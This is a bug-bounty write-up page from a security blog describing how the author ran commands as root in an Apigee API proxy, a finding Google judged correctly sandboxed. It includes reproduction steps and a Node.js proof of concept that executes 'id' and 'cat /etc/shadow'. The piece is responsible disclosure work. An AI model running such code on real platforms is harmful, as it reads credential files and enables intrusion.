<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="theme-color" content="#172a26">
<title>GOOGLE VRP N/A – SANDBOXED RCE AS ROOT ON APIGEE API PROXIES – @omespino</title>
<meta name="robots" content="max-image-preview:large">
<link href="https://fonts.gstatic.com/" crossorigin="anonymous" rel="preconnect">
<link rel="canonical" href="/write-up-google-vrp-n-a-sandboxed-rce-as-root-on-apigee-api-proxies/">
<link rel="stylesheet" href="/custom.css">
</head>
<body class="single">
<div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content">Skip to content</a><header id="masthead" class="site-header">
    <div class="header-inner">
        <div class="site-logo">
            <a href="/">@omespino</a>
        </div>
        <nav id="site-navigation" class="main-navigation">
            <ul class="menu">
                <li class="menu-item"><a href="/">About</a></li>
                <li class="menu-item"><a href="/research.html">Research</a></li>
                <li class="menu-item"><a href="/conferences.html">Conferences</a></li>
            </ul>
        </nav>
    </div>
</header><div id="content" class="site-content"><div id="primary" class="content-area"><main id="main" class="site-main" role="main"><h1 class="hero-title">research</h1><article><header class="entry-header"><div class="entry-meta"><span class="category-tag">WEB</span><span class="amount-tag amount-na">N/A</span><span class="posted-on"><a href="/write-up-google-vrp-n-a-sandboxed-rce-as-root-on-apigee-api-proxies/"><time class="entry-date published" datetime="2020-12-19T20:29:32-07:00">December 2020</time></a></span></div>
<h1 class="entry-title">GOOGLE VRP N/A – SANDBOXED RCE AS ROOT ON APIGEE API PROXIES</h1></header><div class="entry-wrapper">
<div class="entry-content">
<p><strong>Introduction</strong>
Hi everyone It’s been a while since my last post but I’m back, I want to tell you a very short story about one of my last bugs, and how I managed to get an RCE as Root in Apigee (Google acquisition) <br></p>
<p>
Extracted from Google VRP’s report: (the actual Google VRP report) </p>
<p>Summary RCE on Apigee API proxies<br><br>Steps to reproduce: </p>
<p>1.- open apigee.com login in with your account </p>
<p>2.- navigate to Develop &gt; API proxies and click “+Proxy” button </p>
<p>3.- select hosted target: – put any name (in this case “rce”) – select “Quick start” radio button and the “Next” button – then “Next” again, and “Next” one more time – – check “prod” checkbox and clic “Create and Deploy” Button – after the deploy, copy the url and clic on “Edit proxy”</p>
<p> 4.- select “Develop” tab, then clic the “index.js” file in “Resources &gt; hosted” section, and replace the content of that file with and clic on “Save” and “Save” one more time:</p>
<pre class="code-block"><code>var http = require('http');
const { exec } = require('child_process');
var svr = http.createServer(function(req, resp) {
  resp.setHeader('Content-Type', 'application/json');
    // you can put any linux command in exec function 
    exec(<span class="payload-highlight"><b>'echo "- - - - id - - - -";id; echo ;echo "- cat /etc/shadow - ";cat /etc/shadow' </b></span>, 
    	(error, stdout, stderr) =&gt; {
        	resp.end(stdout + '\npoc by @omespino');
    	}
    );
});
svr.listen(process.env.PORT || 3000, function() {});</code></pre>
<p>5.- then visit the url of your proxy and voilà!, profit RCE as root in that Apigee instance</p>
<div class="content-video"><iframe loading="lazy" id="player" type="text/html" width="1024" height="390" src="https://www.youtube.com/embed/5MxXr38OYNo" frameborder="0"></iframe></div>
<p>
Nov 27, 2020: Sent the report to Google VRP<br>Dec 2, 2020: Got a message from google that the bug was triaged (P2)<br>Dec 15, 2020: Got a message from google “The executed code is correctly sandboxed.”<br><be><br> Well that’s it, share your thoughts, what do you think about how they handle that security issue? If you have any doubt, comments or suggestions just drop me a line here or on Twitter <a href="https://twitter.com/omespino">@omespino</a>, read you later.</be></p>

</div>
<footer class="entry-footer"></footer>
<nav class="post-navigation" aria-label="Post navigation">
<div class="nav-links">
<div class="nav-previous"><a href="/write-up-google-vrp-n-a-ssrf-bypass-with-quadzero-in-google-cloud-monitoring/"></a></div>
<div class="nav-next"><a href="/write-up-google-bug-bounty-xss-to-cloud-shell-instance-takeover-rce-as-root-5000-usd/"></a></div>
</div>
</nav>
</article></main></div></div><footer id="colophon" class="site-footer" role="contentinfo"><div class="site-info">just another security blog</div></footer></div><script src="/custom.js" defer></script></body>
</html>
